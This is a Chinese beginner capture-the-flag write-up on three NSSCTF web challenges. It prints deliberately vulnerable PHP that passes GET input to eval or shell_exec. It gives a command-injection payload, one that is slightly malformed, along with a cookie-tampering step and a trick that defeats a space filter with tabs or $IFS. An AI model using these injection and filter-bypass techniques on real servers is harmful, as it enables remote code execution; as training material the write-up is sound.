这里通过nssctf的题单web安全入门来写,会按照题单详细解释每题。题单在NSSCTF中。
想入门ctfweb的可以看这个系列,之后会一直出这个题单的解析,题目一共有28题,打算写10篇。
目录
[SWPUCTF 2021 新生赛]caidao
[SWPUCTF 2021 新生赛]easyrce
[SWPUCTF 2021 新生赛]babyrce
[SWPUCTF 2021 新生赛]caidao
[SWPUCTF 2021 新生赛]caidao
这里直接蚁剑连
[SWPUCTF 2021 新生赛]easyrce
[SWPUCTF 2021 新生赛]easyrce
<?php
error_reporting(0); #屏蔽错误信息
highlight_file(__FILE__); #将当前文件代码输出到页面
if(isset($_GET['url'])) #判断通过get获取的url是不是为空
{
eval($_GET['url']); #eval执行php代码 这里是将url的内容执行
}
?>
这里会执行php代码而且没有做过滤
system在php中用于执行shell命令
?url=system("ls');
[SWPUCTF 2021 新生赛]babyrce
[SWPUCTF 2021 新生赛]babyrce |
<?php
error_reporting(0); #屏蔽报错信息
header("Content-Type:text/html;charset=utf-8");
highlight_file(__FILE__); #将当前文件的代码输出到页面上
if($_COOKIE['admin']==1) #判断admin的cookie的值是不是1 $_COOKIE['admin']用于读取admin的cookie
{
include "../next.php"; #包含next.php
}
else
echo "小饼干最好吃啦!";
?> 小饼干最好吃啦!
增加admin和cookie
<?php
error_reporting(0); #屏蔽错误报错信息
highlight_file(__FILE__); #将当前文件的代码显示到页面
error_reporting(0); #屏蔽错误报错信息
if (isset($_GET['url'])) { #判断通过get获取的url是不是为空
$ip=$_GET['url']; #将通过get获取的url赋值给ip
if(preg_match("/ /", $ip)){ #通过preg_match匹配ip中是不是有空格
die('nonono');
}
$a = shell_exec($ip); #shell_exec用于执行外部的shell命令,并将命令的输出作为字符串返回 ,这里返回值赋值给a
echo $a; #输出a
}
?>
这里过滤了空格,我们通过制表符绕过%09是制表符的ascill码
同时$IFS在shell脚本中是一个特殊变量,用于指定分隔符.默认值包括空格,制表符,换行符.